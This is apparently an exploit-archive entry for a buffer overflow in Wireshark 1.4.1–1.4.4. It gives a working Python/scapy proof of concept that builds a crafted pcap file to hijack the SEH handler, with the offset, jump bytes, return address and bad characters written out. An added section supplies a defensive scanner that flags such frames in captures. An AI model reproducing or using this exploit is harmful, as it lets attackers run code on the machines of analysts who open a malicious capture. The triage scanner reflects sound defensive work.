Wireshark is a network protocol analyzer for Windows and Linux. Wireshark 1.4.1 through 1.4.4 has a buffer overflow vulnerability when processing pcap files, which may allow arbitrary code execution. Wireshark 1.4.5 fixes this security issue.
[+] Info:
~~~~~~~~~
Wireshark 1.4.1-1.4.4 SEH Overflow Exploit
[+] Poc:
~~~~~~~~~
#!/usr/bin/env python
# Vulnerable app: Wireshark 1.4.1-1.4.4
# Author: sickness
# Download:
# OS: tested it on Windows XP SP2 and SP3 but it should work on every Windows with DEP off (still working on a drop exploit)
# DATE: 172.164.2011
# Fixed in latest version 1.4.5
# do not forget to feel the pwnsauce with:
####################################################################
# http://redmine.corelan.be:8800/projects/pvefindaddr
####################################################################
# Offset might change!
# Watch out for other bad chars!!
# Current bad chars: \x00\x0a\x0d\x09
####################################################################
# References:
# https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836
# https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838
####################################################################
import sys
from scapy.all import *

# payload=calc.exe
# ppr is from a non-ASLR enabled wireshark module
edevil = Ether(type=0x2323) / ("\x41" * 1239 + "\xeb\x06\x90\x90" + "\x5D\x10\x94\x62" + "\x90" * 16 + "bytes Bytes Protocol" + "\x90" * 4500)
wrpcap("edevil.pcap", edevil)
print(" ")
print("edevil.pcap file created!")
print("Its pwnsauce time!")
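For triage of untrusted captures before they are opened in an affected Wireshark build, the following added example (not part of the original PoC) walks a classic pcap file and reports frames that match the shape of the frame above: EtherType 0x2323 with a payload larger than a normal Ethernet frame carries. The 1500-byte cut-off and the names scan_pcap and build_sample are assumptions made for this sketch; the sample capture is constructed and contains only zero filler.

```python
import io
import struct

SUSPECT_ETHERTYPE = 0x2323  # EtherType used by the PoC frame on this page
MAX_ETH_PAYLOAD = 1500      # assumption: standard Ethernet MTU as the cut-off

def scan_pcap(stream):
    """Return [(frame_no, payload_len)] for oversized 0x2323 frames."""
    header = stream.read(24)
    magic = header[:4]
    # Classic pcap magic (microsecond and nanosecond variants), either byte order.
    if len(header) == 24 and magic in (b"\xd4\xc3\xb2\xa1", b"\x4d\x3c\xb2\xa1"):
        endian = "<"
    elif len(header) == 24 and magic in (b"\xa1\xb2\xc3\xd4", b"\xa1\xb2\x3c\x4d"):
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    linktype = struct.unpack(endian + "I", header[20:24])[0]
    if linktype != 1:  # only LINKTYPE_ETHERNET frames carry an EtherType here
        return []
    hits, frame_no = [], 0
    while True:
        rec = stream.read(16)  # ts_sec, ts_usec, incl_len, orig_len
        if len(rec) < 16:
            break
        incl_len = struct.unpack(endian + "IIII", rec)[2]
        frame = stream.read(incl_len)
        if len(frame) < incl_len:
            break  # truncated record, stop instead of guessing
        frame_no += 1
        if len(frame) < 14:
            continue  # too short to hold an Ethernet header
        ethertype = struct.unpack("!H", frame[12:14])[0]
        payload_len = len(frame) - 14
        if ethertype == SUSPECT_ETHERTYPE and payload_len > MAX_ETH_PAYLOAD:
            hits.append((frame_no, payload_len))
    return hits

def build_sample():
    """Constructed capture: one ordinary frame, one oversized 0x2323 frame."""
    def record(frame):
        return struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    normal = b"\x00" * 12 + b"\x08\x00" + b"\x00" * 46
    big = b"\x00" * 12 + b"\x23\x23" + b"\x00" * 5800
    return io.BytesIO(hdr + record(normal) + record(big))

if __name__ == "__main__":
    print(scan_pcap(build_sample()))
```

To scan a file on disk, pass it opened in binary mode, for example scan_pcap(open(path, "rb")); pcapng captures are rejected with ValueError rather than parsed.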